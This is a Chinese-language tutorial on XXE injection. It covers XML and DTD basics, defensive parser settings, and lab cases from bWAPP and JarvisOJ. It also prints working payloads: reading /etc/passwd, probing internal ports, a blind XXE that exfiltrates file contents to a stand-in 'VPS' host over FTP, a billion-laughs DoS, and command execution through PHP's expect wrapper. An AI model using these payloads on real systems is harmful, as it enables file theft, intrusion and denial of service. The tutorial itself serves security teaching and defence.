XML实体注入(XXE)漏洞深入解析<\/h1>

1. XXE漏洞概述<\/h2>

XXE(XML External Entity Injection)即XML外部实体注入漏洞，发生在应用程序解析XML输入时，没有禁止外部实体的加载，导致可加载恶意外部文件。<\/p>

危害<\/strong>：<\/p>

文件读取<\/li>
命令执行<\/li>
内网端口扫描<\/li>
攻击内网网站<\/li>
发起DoS攻击<\/li> <\/ul>
触发点<\/strong>：可以上传XML文件的位置，没有对上传的XML文件进行过滤。<\/p>
2. XML基础知识<\/h2>
2.1 XML基本特性<\/h3>

设计用于传输和存储数据(不同于HTML用于显示数据)<\/li>
独立于软件和硬件的传输工具<\/li> <\/ul>
2.2 XML基本语法<\/h3>

所有元素必须有关闭标签<\/li>
标签对大小写敏感<\/li>
必须正确嵌套<\/li>
文档必须有根元素<\/li>
属性值必须加引号<\/li>
空格会被保留(多个空格不会被合并)<\/li> <\/ul>
2.3 XML实体引用<\/h3>
预定义的5个实体引用：<\/p>

<<\/code> 对应 <<\/li>
><\/code> 对应 ><\/li>
&<\/code> 对应 &<\/li>
'<\/code> 对应 '<\/li>
"<\/code> 对应 "<\/li> <\/ul> 2.4 XML示例<\/h3> <bookstore><\/span> <\/span> <\/span><\/span> <book<\/span> category=<\/span>"COOKING"<\/span>><\/span> <\/span> <\/span><\/span> <title><\/span>Everyday Italian<\/title><\/span> <\/span> <\/span><\/span> <author><\/span>Giada De Laurentiis<\/author><\/span> <\/span> <\/span><\/span> <year><\/span>2005<\/year><\/span> <\/span> <\/span><\/span> <price><\/span>30.00<\/price><\/span> <\/span> <\/span><\/span> <\/book><\/span> <\/span> <\/span><\/span><\/bookstore><\/span> <\/span> <\/span><\/span><\/code><\/pre>3. DTD(文档类型定义)<\/h2> 3.1 DTD基础<\/h3> DTD定义合法的XML文档构建模块，使用一系列合法元素定义文档结构。<\/p> 3.2 DTD声明方式<\/h3> 内部DTD：直接包含在XML文档中<\/li> 外部DTD：通过外部引用<\/li> <\/ul> 内部DTD示例<\/strong>：<\/p> <?xml version="1.0"?><\/span> <\/span><\/span><!DOCTYPE note [ <\/span><\/span><\/span> <!ELEMENT note (to,from,heading,body)><\/span> <\/span><\/span> <!ELEMENT to (#PCDATA)><\/span> <\/span><\/span> <!ELEMENT from (#PCDATA)><\/span> <\/span><\/span> <!ELEMENT heading (#PCDATA)><\/span> <\/span><\/span> <!ELEMENT body (#PCDATA)><\/span> <\/span><\/span>]> <\/span><\/span><note><\/span> <\/span><\/span> <to><\/span>Y0u<\/to><\/span> <\/span><\/span> <from><\/span>@re<\/from><\/span> <\/span><\/span> <head><\/span>v3ry<\/head><\/span> <\/span><\/span> <body><\/span>g00d!<\/body><\/span> <\/span><\/span><\/note><\/span> <\/span><\/span><\/code><\/pre>外部DTD引用语法<\/strong>：<\/p> <!DOCTYPE root-element SYSTEM "filename"><\/span> <\/span><\/span><\/code><\/pre>3.3 DTD数据类型<\/h3> PCDATA<\/strong>：被解析的字符数据，会被解析器检查实体和标记<\/li> CDATA<\/strong>：字符数据，不会被解析器解析<\/li> <\/ul> 3.4 DTD属性声明<\/h3> 语法：<\/p> <!ATTLIST 元素名称属性名称属性类型默认值><\/span> <\/span><\/span><\/code><\/pre>示例：<\/p> <!ATTLIST payment Hu3sky CDATA "H"><\/span> <\/span><\/span><\/code><\/pre>4. DTD实体<\/h2> 4.1 实体类型<\/h3> 内部实体<\/strong>：<\/p> <!ENTITY 实体名称 "实体的值"><\/span> <\/span><\/span><\/code><\/pre><\/li> 外部实体<\/strong>：<\/p> <!ENTITY 实体名称 SYSTEM "URL"><\/span> <\/span><\/span><\/code><\/pre><\/li> 参数实体<\/strong>：<\/p> <!ENTITY % 实体名称 "值"><\/span> <\/span><\/span>或 <\/span><\/span><!ENTITY % 实体名称 SYSTEM "URL"><\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 4.2 实体示例<\/h3> 内部实体<\/strong>：<\/p> <?xml version="1.0"?><\/span> <\/span><\/span><!DOCTYPE note[ <\/span><\/span><\/span> <!ELEMENT note (name)><\/span> <\/span><\/span> <!ENTITY hack3r "Hu3sky"><\/span> <\/span><\/span>]> <\/span><\/span><note><\/span> <\/span><\/span> <name><\/span>&hack3r;<\/name><\/span> <\/span><\/span><\/note><\/span> <\/span><\/span><\/code><\/pre>参数实体+外部实体<\/strong>：<\/p> <?xml version="1.0" encoding="utf-8"?><\/span> <\/span><\/span><!DOCTYPE a [ <\/span><\/span><\/span> <!ENTITY % name SYSTEM "file:\/\/\/etc\/passwd"><\/span> <\/span><\/span> %name; <\/span><\/span>]> <\/span><\/span><\/code><\/pre>5. XXE攻击技术<\/h2> 5.1 有回显的XXE攻击<\/h3> 文件读取示例<\/strong>：<\/p> <?xml version="1.0"?><\/span> <\/span><\/span><!DOCTYPE ANY [ <\/span><\/span><\/span> <!ENTITY xxe SYSTEM "file:\/\/\/etc\/passwd"><\/span> <\/span><\/span>]> <\/span><\/span><root><\/span> <\/span><\/span> <name><\/span>&xxe;<\/name><\/span> <\/span><\/span><\/root><\/span> <\/span><\/span><\/code><\/pre>内网端口扫描<\/strong>：<\/p> <?xml version="1.0" encoding="utf-8"?><\/span> <\/span><\/span><!DOCTYPE XXE [ <\/span><\/span><\/span> <!ELEMENT name ANY ><\/span> <\/span><\/span> <!ENTITY XXE SYSTEM "http:\/\/127.0.0.1:80" ><\/span> <\/span><\/span>]> <\/span><\/span><root><\/span> <\/span><\/span> <name><\/span>&XXE;<\/name><\/span> <\/span><\/span><\/root><\/span> <\/span><\/span><\/code><\/pre>5.2 Blind XXE(无回显)<\/h3> 攻击流程<\/strong>：<\/p> 客户端发送payload 1给web服务器<\/li> web服务器向vps获取恶意DTD，并执行文件读取payload2<\/li> web服务器带着回显结果访问VPS上特定的FTP或HTTP<\/li> 通过VPS获得回显(nc监听端口)<\/li> <\/ol> Payload 1(客户端)<\/strong>：<\/p> <?xml version="1.0" encoding="UTF-8"?><\/span> <\/span><\/span><!DOCTYPE root [ <\/span><\/span><\/span> <!ENTITY % remote SYSTEM "http:\/\/vps\/test.xml"><\/span> <\/span><\/span> %remote; <\/span><\/span>]> <\/span><\/span><\/code><\/pre>Payload 2(test.xml内容)<\/strong>：<\/p> <!ENTITY % payload SYSTEM "file:\/\/\/etc\/passwd"><\/span> <\/span><\/span><!ENTITY % int "<!ENTITY % trick SYSTEM 'ftp:\/\/VPS:21\/%payload;'><\/span>"> <\/span><\/span>%int; <\/span><\/span>%trick; <\/span><\/span><\/code><\/pre>5.3 DoS攻击<\/h3> 递归实体引用示例<\/strong>：<\/p> <?xml version="1.0"?><\/span> <\/span><\/span><!DOCTYPE lolz [ <\/span><\/span><\/span> <!ENTITY lol "lol"><\/span> <\/span><\/span> <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"><\/span> <\/span><\/span> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"><\/span> <\/span><\/span> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"><\/span> <\/span><\/span> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"><\/span> <\/span><\/span> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"><\/span> <\/span><\/span> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"><\/span> <\/span><\/span> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"><\/span> <\/span><\/span> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"><\/span> <\/span><\/span>]> <\/span><\/span><lolz><\/span>&lol9;<\/lolz><\/span> <\/span><\/span><\/code><\/pre>5.4 命令执行<\/h3> PHP环境示例<\/strong>：<\/p> <?<\/span>php<\/span> <\/span><\/span>$xml =<\/span> <<<<\/span>EOF<\/span> <\/span><\/span><\/span><?xml version = "1.0"?> <\/span><\/span><\/span><!DOCTYPE ANY [ <\/span><\/span><\/span> <!ENTITY f SYSTEM "except:\/\/ls"> <\/span><\/span><\/span>]> <\/span><\/span><\/span><x>&f;<\/x> <\/span><\/span><\/span><\/span>EOF<\/span>; <\/span><\/span>$data =<\/span> simplexml_load_string<\/span>($xml); <\/span><\/span>print_r<\/span>($data); <\/span><\/span>?><\/span> <\/span><\/span><\/span><\/code><\/pre>6. XXE防御措施<\/h2> 6.1 禁用外部实体<\/h3> PHP<\/strong>：<\/p> libxml_disable_entity_loader<\/span>(true<\/span>); <\/span><\/span><\/code><\/pre>Java<\/strong>：<\/p> DocumentBuilderFactory dbf =<\/span> DocumentBuilderFactory.<\/span>newInstance<\/span>();<\/span> <\/span><\/span>dbf.<\/span>setExpandEntityReferences<\/span>(<\/span>false<\/span>);<\/span> <\/span><\/span><\/code><\/pre>Python<\/strong>：<\/p> from<\/span> lxml import<\/span> etree <\/span><\/span>xmlData =<\/span> etree.<\/span>parse(xmlSource, etree.<\/span>XMLParser(resolve_entities=<\/span>False<\/span>)) <\/span><\/span><\/code><\/pre>6.2 其他防御措施<\/h3> 过滤用户提交的XML数据中的关键字：<!DOCTYPE<\/code>、<!ENTITY<\/code>、SYSTEM<\/code>、PUBLIC<\/code><\/li> 不允许XML中含有自定义的DTD<\/li> 使用更安全的JSON替代XML<\/li> <\/ul> 7. 实际案例分析<\/h2> 7.1 bWAPP平台XXE漏洞<\/h3> 攻击过程<\/strong>：<\/p> 拦截XML数据提交请求<\/li> 添加恶意外部实体定义<\/li> 在XML数据中调用该实体<\/li> <\/ol> Payload示例<\/strong>：<\/p> <?xml version="1.0"?><\/span> <\/span><\/span><!DOCTYPE ANY [ <\/span><\/span><\/span> <!ENTITY hu3sky SYSTEM "file:\/\/\/etc\/passwd"><\/span> <\/span><\/span>]> <\/span><\/span><reset><login><\/span>&hu3sky;<\/login><secret><\/span>Any bugs?<\/secret><\/reset><\/span> <\/span><\/span><\/code><\/pre>7.2 JarvisOJ API调用题<\/h3> 解题思路<\/strong>：<\/p> 发现API接受JSON数据<\/li> 尝试将JSON改为XML格式<\/li> 构造恶意XML进行文件读取<\/li> <\/ol> 8. 总结<\/h2> XXE漏洞是一种危险的XML解析漏洞，攻击者可以利用它读取服务器文件、扫描内网、执行DoS攻击等。防御XXE的关键在于禁用外部实体加载，并对用户提交的XML数据进行严格过滤。开发人员应了解XML解析的安全风险，并采取适当的防护措施。<\/p>